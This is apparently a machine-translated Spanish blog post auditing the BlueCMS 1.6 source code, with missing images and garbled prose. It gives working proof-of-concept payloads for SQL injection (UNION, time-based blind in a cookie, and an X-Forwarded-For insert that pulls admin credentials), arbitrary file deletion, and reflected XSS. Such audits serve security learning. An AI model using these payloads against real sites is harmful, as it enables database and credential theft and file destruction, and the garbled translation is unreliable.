auditoría de código Bluecms1.6

ad_js inyección sql

inyección numérica
Aquí Insertar imagen Descripción

1%20union%20select%201,2,3,4,5,6,(select%20user())

Aquí Insertar imagen Descripción

common.inc.php inyección SQL

En este documento incluye, debe ser la base de alguna función o configuración, por lo que cualquier documento que contenga este puede ser inyectado emmm
encontrar publish.php, solo contiene el archivo de
Aquí Insertar imagen Descripción
punto de inyección common.inc.php:

if(!$_SESSION['user_id'])
{
    if($_COOKIE['BLUE']['user_id'] && $_COOKIE['BLUE']['user_name'] && $_COOKIE['BLUE']['user_pwd'])
    {
        if(check_cookie($_COOKIE['BLUE']['user_name'], $_COOKIE['BLUE']['user_pwd']))
        {
            update_user_info($_COOKIE['BLUE']['user_name']);
        }
    }
    else if($_COOKIE['BLUE']['user_name'])
    {

        $user_name = $_COOKIE['BLUE']['user_name'];
        $user = $db->query("SELECT COUNT(*) AS num FROM ".table('user')." WHERE user_name='$user_name'");

Si no puede ver el aterrizaje, y sólo $ _COOKIE [ 'BLUE'] [ 'nombre_usuario'] tiene un valor, será de consultas SQL, pero parece que sólo puede persianas
Aquí Insertar imagen Descripción
saltar automáticamente a la página de destino después de un retraso, con el fin de ver el Saltar por primera vez claramente anotada:
Aquí Insertar imagen Descripción
nada de filtrado, retardo éxito
Aquí Insertar imagen Descripción
poc:

BLUE[user_name]:w4'and if(((ascii(mid((select database()),1,1)))=98),sleep(3),0)#

publish.php eliminar cualquier archivo

En la línea 316:
Aquí Insertar imagen Descripción
parámetros controlables $ acto:
Aquí Insertar imagen Descripción
la mencionada identificación también controlable, crear una página de prueba:
Aquí Insertar imagen Descripción
Aquí Insertar imagen Descripción

publish.php?act=del_pic&id=test.php

Visita de nuevo:
Aquí Insertar imagen Descripción
en los archivos borrados tienen una gran cantidad de columnas en este caso que ~

user.php XSS

Hay XSS-mail a
Aquí Insertar imagen Descripción
Aquí Insertar imagen Descripción

admin / card.php XSS (tipo de reflexión)

Sin Filtro en la salida directa, por lo que sólo puede bombardear
Aquí Insertar imagen Descripción

name=<script>alert(1)</script>&value=1&price=1&act=do_edit&id=1

Aquí Insertar imagen Descripción

archivo contiene user.php

Aquí Insertar imagen Descripción
Este contiene un punto controlable, pero sobre todo detrás de la index.php, 00% de truncamiento no tiene éxito, que hace referencia al artículo de línea, la

La longitud máxima es de 256 bytes de directorio en Windows, Linux longitud máxima de directorio de 4096 bytes

Ideas, versión 5.2, pero no cómo están incluidos, que representan el hoyo

inyección comment.php xff

carga útil;

1','1'),('','1','2','1','6',(select concat(admin_name,':',pwd) from blue_admin),'1','1

Aquí Insertar imagen Descripción

tpl_manage.php modificar cualquier archivo

Aquí Insertar imagen Descripción
Aquí Insertar imagen Descripción
Aquí Insertar imagen Descripción
Aquí Insertar imagen Descripción

user.php ningún salto

Aquí Insertar imagen Descripción
Tal vez que se puede utilizar FRSS codificación base64 lo que se requiere
Aquí Insertar imagen Descripción

resumen

Los primeros cms Mira, no saben por dónde empezar, un poco de debilidad, algunos agujeros evidentes o, a veces no se dio cuenta, sin embargo, que el código de pequeñas CMS no es tan complicado, la vulnerabilidad es relativamente simple y fácil de usar, sea el primero en empezar, bastante pequeña cosecha, después de que el cms de prueba lo más importante es conseguir la entrada del usuario empiezan a ver Esto es sólo una pequeña fuente de inestabilidad? (NaH)

Supongo que te gusta

Origin www.cnblogs.com/W4nder/p/12528857.html
Recomendado
Clasificación